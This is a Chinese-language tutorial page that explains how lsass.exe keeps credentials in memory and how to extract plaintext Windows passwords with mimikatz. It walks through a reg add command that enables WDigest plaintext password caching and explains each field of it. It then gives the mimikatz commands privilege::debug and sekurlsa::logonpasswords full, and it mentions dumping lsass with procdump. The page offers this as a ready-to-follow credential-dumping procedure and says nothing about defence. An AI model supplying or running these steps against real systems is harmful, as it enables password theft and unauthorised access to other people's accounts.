赞
踩
目录
lsass.exe是Windows操作系统中的一个关键进程,它负责本地安全和登录策略。当用户登录时,lsass.exe会使用一个可逆的算法加密明文密码,并将密文保存在内存中。
mimikatz通过注入代码到操作系统的内存中,能够读取和解密这些由lsass.exe进程保存的加密凭证。具体的操作是,mimikatz先利用管理员权限执行一些操作,如使用procdump等工具lsass.exe进程转储成一个dmp文件。这个dmp文件包含了加密的用户凭证信息。然后,mimikatz读取这个dmp文件,并利用其内置的解密算法还原出明文密码。
在Windows 10或更高版本的系统中,默认情况下,操作系统会在内存缓存中禁止保存明文密码。这意味着,直接读取lsass.exe进程的内存将无法获取到明文密码。为了在Windows 10上获取明文密码,需要采取一些额外的步骤。首先,通过修改注册表的方式让Wdigest Auth保存明文口令。具体是执行类似于reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f的命令。修改注册表后,需要等待系统管理员重新登录,此时Wdigest Auth会保存明文口令到内存中。然后,再次使用mimikatz等工具读取lsass.exe进程的内存,即可获取到明文密码。
mimikatz
(我电脑是64位所以选择64位)
在cmd中输入以下命令
- reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
-
- #命令各个字段解析
- 1、reg add:
- 2、这是Windows命令行工具reg的一个子命令,用于向注册表中添加新的项或值。
- HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest:
- 这是注册表项的完整路径。
- HKLM:代表HKEY_LOCAL_MACHINE,这是Windows注册表中的一个根键,用于存储关于计算机硬件和软件的配置信息。
- 接下来的路径SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest指定了我们要修改的注册表项的详细位置。
- 3、/v UseLogonCredential:
- 这指定了我们要添加或修改的注册表值的名称,即UseLogonCredential。
- 4、/t REG_DWORD
- 这指定了注册表值的类型,即REG_DWORD。REG_DWORD是一个32位数值,通常用于存储整数。
- /d 1
- 5、这指定了注册表值的数据。在这种情况下,我们将UseLogonCredential的值设置为1。
- 在这个特定的上下文中,将UseLogonCredential设置为1允许Windows Digest身份验证(由WDigest提供)存储用户的明文密码。
- /f:
- 这是一个强制选项,意味着命令将不会提示用户确认。它将直接修改注册表,而不会询问用户是否确定。
出现如下图所示提示说明修改成功,若修改失败请检查cmd权限
上面命令执行后需要重启在会显示结果
在Windows环境中,调试权限是一种允许用户调试其他进程和系统组件的特殊权限。拥有调试权限的用户可以附加到任何进程上,这通常用于开发、故障排除或恶意活动。这通常是通过调Windows API或执行某些底层操作来完成的。
输入以下代码进入调试权限
privilege::debug
出现如下图所示提示进入调试权限成功
输入以下命令查看密码
sekurlsa::logonpasswords full
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。